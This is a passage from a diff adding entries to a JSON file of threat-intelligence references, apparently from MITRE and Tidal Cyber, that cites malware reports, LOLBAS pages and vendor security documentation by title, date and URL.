"https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Unveiling Patchwork - The Copy-Paste APT" + }, + "related": [], + "uuid": "d4e43b2c-a858-4285-984f-f59db5c657bd", + "value": "Cymmetria Patchwork" + }, + { + "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2013-08-26T00:00:00Z", + "refs": [ + "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" + ], + "source": "MITRE", + "title": "Upcoming G20 Summit Fuels Espionage Operations" + }, + "related": [], + "uuid": "2235ff2a-07b8-4198-b91d-e50739e274f4", + "value": "Rapid7G20Espionage" + }, + { + "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.", + "meta": { + "date_accessed": "2020-06-17T00:00:00Z", + "date_published": "2020-05-11T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/" + ], + "source": "MITRE", + "title": "Updated BackConfig Malware Targeting Government and Military Organizations in South Asia" + }, + "related": [], + "uuid": "f26629db-c641-4b6b-abbf-b55b9cc91cf1", + "value": "Unit 42 BackConfig May 2020" + }, + { + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.", + "meta": { + "date_accessed": "2020-08-12T00:00:00Z", + "date_published": "2019-07-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + ], + "source": "MITRE", + "title": "Updated Karagany Malware Targets Energy Sector" + }, + "related": [], + "uuid": "61c05edf-24aa-4399-8cdf-01d27f6595a1", + "value": "Secureworks Karagany July 2019" + }, + { + "description": "LOLBAS. (2019, June 26). Update.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-06-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/" + ], + "source": "Tidal Cyber", + "title": "Update.exe" + }, + "related": [], + "uuid": "2c85d5e5-2cb2-4af7-8c33-8aaac3360706", + "value": "Update.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.", + "meta": { + "date_accessed": "2020-12-30T00:00:00Z", + "date_published": "2020-09-14T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365" + ], + "source": "MITRE", + "title": "Update or repair the settings of a federated domain in Office 365, Azure, or Intune" + }, + "related": [], + "uuid": "1db3856e-d581-42e6-8038-44b0a2a2b435", + "value": "Microsoft - Update or Repair Federated domain" + }, + { + "description": "Gabrielle Joyce Mabutas, Luis Magisa, Steven Du. (2020, July 17). Updates on Quickly-Evolving ThiefQuest macOS Malware. Retrieved April 26, 2021.", + "meta": { + "date_accessed": "2021-04-26T00:00:00Z", + "date_published": "2020-07-17T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/g/updates-on-quickly-evolving-thiefquest-macos-malware.html" + ], + "source": "MITRE", + "title": "Updates on Quickly-Evolving ThiefQuest macOS Malware" + }, + "related": [], + "uuid": "880c1b9e-55a1-404c-9754-1fc2ee30a72b", + "value": "Trendmicro Evolving ThiefQuest 2020" + }, + { + "description": "AWS. (n.d.). update-trail. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "refs": [ + "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html" + ], + "source": "MITRE", + "title": "update-trail" + }, + "related": [], + "uuid": "a94e1e4a-2963-5563-a8a6-ab9f64a86476", + "value": "AWS Update Trail" + }, + { + "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2015-07-27T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + ], + "source": "MITRE", + "title": "UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload" + }, + "related": [], + "uuid": "42d35b93-2866-46d8-b8ff-675df05db9db", + "value": "Unit 42 Pirpi July 2015" + }, + { + "description": "PaperCut. (2023, March 8). URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut. Retrieved August 3, 2023.", + "meta": { + "date_accessed": "2023-08-03T00:00:00Z", + "date_published": "2023-03-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps" + ], + "source": "Tidal Cyber", + "title": "URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut" + }, + "related": [], + "uuid": "d6e71b45-fc91-40f4-8201-2186994ae42a", + "value": "PaperCut MF/NG vulnerability bulletin" + }, + { + "description": "LOLBAS. (2018, May 25). Url.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Url/" + ], + "source": "Tidal Cyber", + "title": "Url.dll" + }, + "related": [], + "uuid": "0c88fb72-6be5-4a01-af1c-553650779253", + "value": "Url.dll - LOLBAS Project" + }, + { + "description": "NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2016-09-27T00:00:00Z", + "refs": [ + "https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif" + ], + "source": "MITRE", + "title": "Ursnif" + }, + "related": [], + "uuid": "d57a2efe-8c98-491e-aecd-e051241a1779", + "value": "NJCCIC Ursnif Sept 2016" + }, + { + "description": "Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2015-03-26T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992" + ], + "source": "MITRE", + "title": "URSNIF: The Multifaceted Malware" + }, + "related": [], + "uuid": "d02287df-9d93-4cbe-8e59-8f4ef3debc65", + "value": "TrendMicro Ursnif Mar 2015" + }, + { + "description": "US Coast Guard Cyber Command. (2022, August 17). US Coast Guard Cyber Command Maritime Cyber Alert 03-22. Retrieved October 9, 2023.", + "meta": { + "date_accessed": "2023-10-09T00:00:00Z", + "date_published": "2022-08-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.dco.uscg.mil/Portals/9/Maritime%20Cyber%20Alert%2003-22%20KILLNET%20TLP%20WHITE.pdf" + ], + "source": "Tidal Cyber", + "title": "US Coast Guard Cyber Command Maritime Cyber Alert 03-22" + }, + "related": [], + "uuid": "2d2a6f76-9531-4b35-b247-ae5da8663a92", + "value": "US Coast Guard Killnet August 17 2022" + }, + { + "description": "USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020.", + "meta": { + "date_accessed": "2020-11-16T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "refs": [ + "https://twitter.com/CNMF_CyberAlert/status/1311743710997159953" + ], + "source": "MITRE", + "title": "USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA" + }, + "related": [], + "uuid": "600de668-f128-4368-8667-24ed9a9db47a", + "value": "USCYBERCOM SLOTHFULMEDIA October 2020" + }, + { + "description": "Microsoft. (2021, July 2). Use attack surface reduction rules to prevent malware infection. Retrieved June 24, 2021.", + "meta": { + "date_accessed": "2021-06-24T00:00:00Z", + "date_published": "2021-07-02T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction" + ], + "source": "MITRE", + "title": "Use attack surface reduction rules to prevent malware infection" + }, + "related": [], + "uuid": "4499df4a-53c2-4f17-ac90-b99272f5f522", + "value": "win10_asr" + }, + { + "description": "Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.", + "meta": { + "date_accessed": "2022-08-30T00:00:00Z", + "date_published": "2022-08-26T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion" + ], + "source": "MITRE", + "title": "Use Azure AD access reviews to manage users excluded from Conditional Access policies" + }, + "related": [], + "uuid": "8cfb45ec-b660-4a3a-9175-af4ea01ef473", + "value": "Azure AD Conditional Access Exclusions" + }, + { + "description": "Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "refs": [ + "https://docs.docker.com/storage/bind-mounts/" + ], + "source": "MITRE", + "title": "Use Bind Mounts" + }, + "related": [], + "uuid": "b298b3d1-30c1-4894-b1de-be11812cde6b", + "value": "Docker Bind Mounts" + }, + { + "description": "Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "refs": [ + "https://support.google.com/chrome/a/answer/7349337" + ], + "source": "MITRE", + "title": "Use Chrome Browser with Roaming User Profiles" + }, + "related": [], + "uuid": "cf0bb77d-c7f7-515b-9217-ba9120cdddec", + "value": "Chrome Roaming Profiles" + }, + { + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "meta": { + "date_accessed": "2018-09-13T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + ], + "source": "MITRE", + "title": "US elections" + }, + "related": [], + "uuid": "a1192cb3-4536-4900-93c7-a127ca06c690", + "value": "Ars Technica GRU indictment Jul 2018" + }, + { + "description": "Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "refs": [ + "https://support.apple.com/en-us/HT209161" + ], + "source": "MITRE", + "title": "Use MDM to enable Remote Management in macOS" + }, + "related": [], + "uuid": "e5f59848-7014-487d-9bae-bed81af1b72b", + "value": "Remote Management MDM macOS" + }, + { + "description": "Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-04-28T00:00:00Z", + "refs": [ + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/" + ], + "source": "MITRE", + "title": "Use of DNS Tunneling for C&C Communications" + }, + "related": [], + "uuid": "07855a81-1b72-4361-917e-a413b0124eca", + "value": "Securelist Denis April 2017" + }, + { + "description": "Microsoft. (n.d.). User Account Control. Retrieved January 18, 2018.", + "meta": { + "date_accessed": "2018-01-18T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx" + ], + "source": "MITRE", + "title": "User Account Control" + }, + "related": [], + "uuid": "2eb2fb2f-0b43-4c8c-a69f-3f76a8fd90f3", + "value": "Microsoft UAC" + }, + { + "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", + "meta": { + "date_accessed": "2016-07-26T00:00:00Z", + "date_published": "2009-07-01T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx" + ], + "source": "MITRE", + "title": "User Account Control: Inside Windows 7 User Account Control" + }, + "related": [], + "uuid": "dea47af6-677a-4625-8664-adf0e6839c9f", + "value": "TechNet Inside UAC" + }, + { + "description": "Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2017-08-29T00:00:00Z", + "refs": [ + "https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/" + ], + "source": "MITRE", + "title": "User Approved Kernel Extension Loading…" + }, + "related": [], + "uuid": "7700928b-2d27-470c-a2d9-e5c5f9a43af3", + "value": "User Approved Kernel Extension Pike’s" + }, + { + "description": "Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2014-10-15T00:00:00Z", + "refs": [ + "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/" + ], + "source": "MITRE", + "title": "Userland Rootkits: Part 1, IAT hooks" + }, + "related": [], + "uuid": "9a0e7054-9239-43cd-8e5f-aac8b665be72", + "value": "Adlice Software IAT Hooks Oct 2014" + }, + { + "description": "Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2023-03-06T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630" + ], + "source": "MITRE", + "title": "username - Cisco IOS Security Command Reference: Commands S to Z" + }, + "related": [], + "uuid": "8e7b99d7-ad94-5802-a1ee-6334842e7e0b", + "value": "cisco_username_cmd" + }, + { + "description": "Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.", + "meta": { + "date_accessed": "2018-04-05T00:00:00Z", + "date_published": "2016-01-25T00:00:00Z", + "refs": [ + "https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines" + ], + "source": "MITRE", + "title": "User password policies on non AD machines" + }, + "related": [], + "uuid": "aa3846fd-a307-4be5-a487-9aa2688d5816", + "value": "Jamf User Password Policies" + }, + { + "description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.", + "meta": { + "date_accessed": "2021-06-14T00:00:00Z", + "refs": [ + "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac" + ], + "source": "MITRE", + "title": "Use rules to manage emails you receive in Mail on Mac" + }, + "related": [], + "uuid": "f83283aa-3aaf-4ebd-8503-0d84c2c627c4", + "value": "MacOS Email Rules" + }, + { + "description": "Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "refs": [ + "https://support.apple.com/en-us/HT201710" + ], + "source": "MITRE", + "title": "Use the kickstart command-line utility in Apple Remote Desktop" + }, + "related": [], + "uuid": "f26542dd-aa61-4d2a-a05a-8f9674b49f82", + "value": "Kickstart Apple Remote Desktop commands" + }, + { + "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.", + "meta": { + "date_accessed": "2018-08-07T00:00:00Z", + "date_published": "2018-02-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection" + ], + "source": "MITRE", + "title": "Use Windows Event Forwarding to help with intrusion detection" + }, + "related": [], + "uuid": "4e7c36b9-415f-41f1-980e-251d92994eb4", + "value": "Microsoft Windows Event Forwarding FEB 2018" + }, + { + "description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.", + "meta": { + "date_accessed": "2020-06-12T00:00:00Z", + "date_published": "2020-01-28T00:00:00Z", + "refs": [ + "https://support.apple.com/HT208050" + ], + "source": "MITRE", + "title": "Use zsh as the default shell on your Mac" + }, + "related": [], + "uuid": "5374ad8e-96a2-4d19-b2cf-28232fa97b52", + "value": "Apple ZShell" + }, + { + "description": "Kuberenets. (n.d.). Using ABAC Authorization. Retrieved July 14, 2023.", + "meta": { + "date_accessed": "2023-07-14T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/access-authn-authz/abac/" + ], + "source": "MITRE", + "title": "Using ABAC Authorization" + }, + "related": [], + "uuid": "7f960599-a3d6-53bb-91ff-f0e6117a30ed", + "value": "Kuberentes ABAC" + }, + { + "description": "Kasza, A. (2015, February 18). Using Algorithms to Brute Force Algorithms. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2015-02-18T00:00:00Z", + "refs": [ + "https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/" + ], + "source": "MITRE", + "title": "Using Algorithms to Brute Force Algorithms" + }, + "related": [], + "uuid": "d0eacad8-a6ff-4282-8fbc-d7984ad03b56", + "value": "Cisco Umbrella DGA Brute Force" + }, + { + "description": "Graeber, M. (2016, September 8). Using Device Guard to Mitigate Against Device Guard Bypasses. Retrieved September 13, 2016.", + "meta": { + "date_accessed": "2016-09-13T00:00:00Z", + "date_published": "2016-09-08T00:00:00Z", + "refs": [ + "http://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html" + ], + "source": "MITRE", + "title": "Using Device Guard to Mitigate Against Device Guard Bypasses" + }, + "related": [], + "uuid": "8130e5e1-376f-4945-957a-aaf8684b361b", + "value": "Exploit Monday Mitigate Device Guard Bypases" + }, + { + "description": "Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/ms677982.aspx" + ], + "source": "MITRE", + "title": "Using DsAddSidHistory" + }, + "related": [], + "uuid": "11c44e1e-28d8-4d45-8539-6586466a5b3c", + "value": "Microsoft DsAddSidHistory" + }, + { + "description": "Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.", + "meta": { + "date_accessed": "2021-01-07T00:00:00Z", + "date_published": "2020-12-28T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/" + ], + "source": "MITRE", + "title": "Using Microsoft 365 Defender to protect against Solorigate" + }, + "related": [], + "uuid": "449cf112-535b-44af-9001-55123b342779", + "value": "Microsoft 365 Defender Solorigate" + }, + { + "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", + "meta": { + "date_accessed": "2017-02-13T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/bb490939.aspx" + ], + "source": "MITRE", + "title": "Using Netsh" + }, + "related": [], + "uuid": "58112a3a-06bd-4a46-8a09-4dba5f42a04f", + "value": "TechNet Netsh" + }, + { + "description": "Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.", + "meta": { + "date_accessed": "2017-04-08T00:00:00Z", + "date_published": "2016-09-23T00:00:00Z", + "refs": [ + "https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html" + ], + "source": "MITRE", + "title": "USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST" + }, + "related": [], + "uuid": "663b3fd6-0dd6-45c8-afba-dc0ea6d331b5", + "value": "Demaske Netsh Persistence" + }, + { + "description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.", + "meta": { + "date_accessed": "2019-02-05T00:00:00Z", + "date_published": "2017-07-01T00:00:00Z", + "refs": [ + "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746" + ], + "source": "MITRE", + "title": "Using Outlook Forms for Lateral Movement and Persistence" + }, + "related": [], + "uuid": "ad412d39-c0c5-4119-9193-0ba1309edb3f", + "value": "CrowdStrike Outlook Forms" + }, + { + "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "refs": [ + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules" + ], + "source": "MITRE", + "title": "USING PLUGGABLE AUTHENTICATION MODULES (PAM)" + }, + "related": [], + "uuid": "3dc88605-64c8-495a-9e3b-e5686fd2eb03", + "value": "Red Hat PAM" + }, + { + "description": "Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2022-02-02T00:00:00Z", + "refs": [ + "https://www.varonis.com/blog/power-automate-data-exfiltration" + ], + "source": "MITRE", + "title": "Using Power Automate for Covert Data Exfiltration in Microsoft 365" + }, + "related": [], + "uuid": "16436468-1daf-433d-bb3b-f842119594b4", + "value": "Varonis Power Automate Data Exfiltration" + }, + { + "description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "date_published": "2012-11-29T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/jj865668.aspx" + ], + "source": "MITRE", + "title": "Using security policies to restrict NTLM traffic" + }, + "related": [], + "uuid": "5861ed76-fedd-4ff9-8242-308c7206e4cb", + "value": "Microsoft Disable NTLM Nov 2012" + }, + { + "description": "Microsoft. (2008, September 10). Using SMB Packet Signing. Retrieved February 7, 2019.", + "meta": { + "date_accessed": "2019-02-07T00:00:00Z", + "date_published": "2008-09-10T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)" + ], + "source": "MITRE", + "title": "Using SMB Packet Signing" + }, + "related": [], + "uuid": "32a30a3f-3ed1-4def-86b1-f40bbffa1cc5", + "value": "Microsoft SMB Packet Signing" + }, + { + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "meta": { + "date_accessed": "2016-04-07T00:00:00Z", + "date_published": "2012-06-27T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ], + "source": "MITRE", + "title": "Using Software Restriction Policies and AppLocker Policies" + }, + "related": [], + "uuid": "84e1c53f-e858-4106-9c14-1b536d5b56f9", + "value": "TechNet Applocker vs SRP" + }, + { + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "meta": { + "date_accessed": "2016-04-07T00:00:00Z", + "date_published": "2012-06-27T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/ee791851(v=ws.11)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Using Software Restriction Policies and AppLocker Policies" + }, + "related": [], + "uuid": "774e6598-0926-4adb-890f-00824de07ae0", + "value": "Microsoft Using Software Restriction" + }, + { + "description": "Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.", + "meta": { + "date_accessed": "2022-03-31T00:00:00Z", + "date_published": "2015-11-05T00:00:00Z", + "refs": [ + "https://www.netmeister.org/blog/keychain-passwords.html" + ], + "source": "MITRE", + "title": "Using the OS X Keychain to store and retrieve passwords" + }, + "related": [], + "uuid": "d0ac448a-7299-4ddc-8730-be72fb840ccb", + "value": "OSX Keychain Schaumann" + }, + { + "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged" + ], + "source": "MITRE", + "title": "USNYAG IranianBotnet March 2016" + }, + "related": [], + "uuid": "69ee73c1-359f-4584-a6e7-75119d24bbf5", + "value": "USNYAG IranianBotnet March 2016" + }, + { + "description": "LOLBAS. (2021, September 26). UtilityFunctions.ps1. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/" + ], + "source": "Tidal Cyber", + "title": "UtilityFunctions.ps1" + }, + "related": [], + "uuid": "8f15755b-2e32-420e-8463-497e3f8d8cfd", + "value": "UtilityFunctions.ps1 - LOLBAS Project" + }, + { + "description": "Vander Stoep, J. (2016, April 5). [v3] selinux: restrict kernel module loadinglogin register. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2016-04-05T00:00:00Z", + "refs": [ + "https://patchwork.kernel.org/patch/8754821/" + ], + "source": "MITRE", + "title": "[v3] selinux: restrict kernel module loadinglogin register" + }, + "related": [], + "uuid": "a7c3fc64-9b79-4324-8177-0061208d018c", + "value": "Kernel.org Restrict Kernel Module" + }, + { + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020.", + "meta": { + "date_accessed": "2020-08-31T00:00:00Z", + "date_published": "2020-06-01T00:00:00Z", + "refs": [ + "https://assets.sentinelone.com/labs/sentinel-one-valak-i" + ], + "source": "MITRE", + "title": "Valak Malware and the Connection to Gozi Loader ConfCrew" + }, + "related": [], + "uuid": "92b8ff34-05ef-4139-a6bd-56eb8af9d5e9", + "value": "SentinelOne Valak June 2020" + }, + { + "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.", + "meta": { + "date_accessed": "2020-06-19T00:00:00Z", + "date_published": "2020-05-28T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/valak-more-than-meets-the-eye" + ], + "source": "MITRE", + "title": "VALAK: MORE THAN MEETS THE EYE" + }, + "related": [], + "uuid": "235d1cf1-2413-4620-96cf-083d348410c2", + "value": "Cybereason Valak May 2020" + }, + { + "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping — Advanced Maldoc Techniques. Retrieved September 17, 2020.", + "meta": { + "date_accessed": "2020-09-17T00:00:00Z", + "date_published": "2018-10-10T00:00:00Z", + "refs": [ + "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278" + ], + "source": "MITRE", + "title": "VBA Stomping — Advanced Maldoc Techniques" + }, + "related": [], + "uuid": "d1c88a57-85f4-4a35-a7fa-35e8c7fcd943", + "value": "Walmart Roberts Oct 2018" + }, + { + "description": "LOLBAS. (2020, February 27). vbc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-02-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/" + ], + "source": "Tidal Cyber", + "title": "vbc.exe" + }, + "related": [], + "uuid": "25eb4048-ee6d-44ca-a70b-37605028bd3c", + "value": "vbc.exe - LOLBAS Project" + }, + { + "description": "Veil Framework. (n.d.). Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "refs": [ + "https://www.veil-framework.com/framework/" + ], + "source": "MITRE", + "title": "Veil_Ref" + }, + "related": [], + "uuid": "722755a8-305f-4e37-8278-afb360836bec", + "value": "Veil_Ref" + }, + { + "description": "LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.", + "meta": { + "date_accessed": "2020-08-10T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/" + ], + "source": "MITRE", + "title": "Verclsid.exe" + }, + "related": [], + "uuid": "63ac9e95-aad8-4735-9e63-f45d8c499030", + "value": "LOLBAS Verclsid" + }, + { + "description": "verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020.", + "meta": { + "date_accessed": "2020-08-10T00:00:00Z", + "date_published": "2019-12-17T00:00:00Z", + "refs": [ + "https://www.winosbite.com/verclsid-exe/" + ], + "source": "MITRE", + "title": "verclsid.exe File Information - What is it & How to Block" + }, + "related": [], + "uuid": "5d5fa25b-64a9-4fdb-87c5-1a69a7d2f874", + "value": "WinOSBite verclsid.exe" + }, + { + "description": "Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.", + "meta": { + "date_accessed": "2018-07-05T00:00:00Z", + "date_published": "2018-01-29T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/" + ], + "source": "MITRE", + "title": "VERMIN: Quasar RAT and Custom Malware Used In Ukraine" + }, + "related": [], + "uuid": "0d6db249-9368-495e-9f1f-c7f10041f5ff", + "value": "Unit 42 VERMIN Jan 2018" + }, + { + "description": "JR Gumarin. (2022, December 6). Vice Society: Profiling a Persistent Threat to the Education Sector. Retrieved November 14, 2023.", + "meta": { + "date_accessed": "2023-11-14T00:00:00Z", + "date_published": "2022-12-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://unit42.paloaltonetworks.com/vice-society-targets-education-sector/" + ], + "source": "Tidal Cyber", + "title": "Vice Society: Profiling a Persistent Threat to the Education Sector" + }, + "related": [], + "uuid": "6abf7387-0857-4938-b36e-1374a66d4ed8", + "value": "Unit 42 Vice Society December 6 2022" + }, + { + "description": "Minerva Labs. (2021, September 23). Vidar Stealer Evasion Arsenal. Retrieved November 16, 2023.", + "meta": { + 